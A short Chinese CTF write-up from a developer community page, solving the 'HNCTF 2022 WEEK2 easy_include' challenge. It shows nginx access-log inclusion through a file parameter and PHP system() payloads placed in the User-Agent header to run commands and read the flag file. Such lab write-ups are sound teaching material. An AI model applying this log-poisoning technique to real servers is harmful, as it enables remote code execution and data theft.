AI 助理
文档备案控制台
开发者社区 开发与运维 文章 正文

NSS [HNCTF 2022 WEEK2]easy_include

2024-08-14 286
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: NSS [HNCTF 2022 WEEK2]easy_include

NSS [HNCTF 2022 WEEK2]easy_include

过滤好多,试试日志包含。

服务器是nginx

?file=/var/log/nginx/access.log

修改UA头为<?php system(‘ls’); ?>

修改UA头为<?php system(‘ls /’); ?>

修改UA头为<?php system('tac /ffflllaaaggg'); ?>

文章标签:
PHP
应用服务中间件
nginx
Jay17
目录
相关文章
玥轩
BUUCTF [SWPU2019]我有一只马里奥 1
BUUCTF [SWPU2019]我有一只马里奥 1
玥轩
812 0
BUUCTF [SWPU2019]我有一只马里奥 1
秋说
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
秋说
434 0
Jay17
|
PHP
NSS [NISACTF 2022]level-up
NSS [NISACTF 2022]level-up
Jay17
323 0
Jay17
NSS [HNCTF 2022 WEEK2]ez_ssrf
NSS [HNCTF 2022 WEEK2]ez_ssrf
Jay17
223 0
秋说
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
秋说
10786 0
Jay17
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
Jay17
265 0
Jay17
|
PHP
NSS [鹏城杯 2022]简单包含
NSS [鹏城杯 2022]简单包含
Jay17
180 0
Myon
|
存储 JSON 数据安全/隐私保护
[LitCTF 2023]Flag点击就送!(cookie伪造)
[LitCTF 2023]Flag点击就送!(cookie伪造)
Myon
779 0
aliyun6054359135
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
aliyun6054359135
1678 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
Geek极安云科
|
安全 网络协议 网络安全
2023 金砖国家职业技能大赛网络安全省赛理论题样题(金砖国家未来技能挑战赛)
2023 金砖国家职业技能大赛网络安全省赛理论题样题(金砖国家未来技能挑战赛)
Geek极安云科
765 0